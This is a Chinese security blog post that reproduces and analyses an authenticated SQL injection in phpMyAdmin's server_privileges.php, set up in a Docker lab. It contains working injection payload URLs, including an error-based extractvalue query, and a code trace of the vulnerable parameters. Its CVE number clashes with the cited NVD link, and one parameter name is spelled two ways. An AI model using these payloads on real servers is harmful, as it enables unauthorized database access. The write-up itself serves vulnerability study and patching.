前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2020-0554:phpMyAdmin后台SQL注入

CVE-2020-0554:phpMyAdmin后台SQL注入

作者头像
Timeline Sec
发布2020-03-17 17:24:30
2.8K0
发布2020-03-17 17:24:30
举报
文章被收录于专栏:Timeline SecTimeline Sec

本文作者:li9hu(Timeline Sec基础组成员)

本文共1021字,阅读大约需要3~4分钟

声明:请勿做非法用途,否则后果自负

0x01 简介

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。

0x02 漏洞概述

用户界面SQL执行语句存在可控变量,且未对可控参数进行过滤直接拼接。可造成低权限用户越权执行SQL指令。

0x03 影响版本

前提:已知一个用户名密码

phpMyAdmin 4 < 4.9.4

phpMyAdmin 5 < 5.0.1

0x04 环境搭建

在线环境: 转发本文至朋友圈并截图发至公众号内 自行搭建: 本次复现环境使用PhpMyAdmin4.5.0版本,使用docker搭建。

git clone https://github.com/Paper-Pen/TLSHUB.git
cd TLSHUB/phpAdmin/
docker-compose up -d
docker ps

访问页面http://xx.xx.xx.xx:8001 数据库账号密码root/li9hu

环境搭建好了,可以开始进行漏洞复现了

0x05 漏洞复现

简单总结流程:

页面位置server_privileges.php;

设置变量ajax_requests为true;

设置变量validate_username 为真值;

设置变量username 为我们拼接的注入语句。

构造payload:

http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

(token和其余参数会在访问页面的时候自动提供)

我们查看后端收到的数据,可以看到SQL已经成功拼接。

执行完毕后程序只会告知SQL是否执行成功,失败会报错,因此此处我们可以利用报错注入。

构造payload:

http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

结果如下,可以看到已经成功执行了我们注入的指令。

0x06 漏洞分析

定位到文件libraries/server_privileges.lib.php,此处就是SQL注入存在点,username和validate_username都可控,我们往上回溯定位if所在的函数。

可以看到if处于PMA_getExtraDataForAjaxBehavior函数内。下一步使用phpsotorm快捷键ctrl+B定位到触发此函数的点。

跳转到文件server_privileges.php可以看到$extra_data触发了此函数,处于一个if内,下一步快捷键ctrl+shift+F全局搜索变量is_ajax_request,看看是否可控让其为真值。

跳转到文件libraries/common.inc.php这里有可控变量ajax_request只要给它附true就可以返回true了。

0x07 修复方式

更新官方最新补丁

参考链接:

https://nvd.nist.gov/vuln/detail/CVE-2020-5504

https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/tree/master/phpMyadmin/CVE-2020-0554

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-03-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档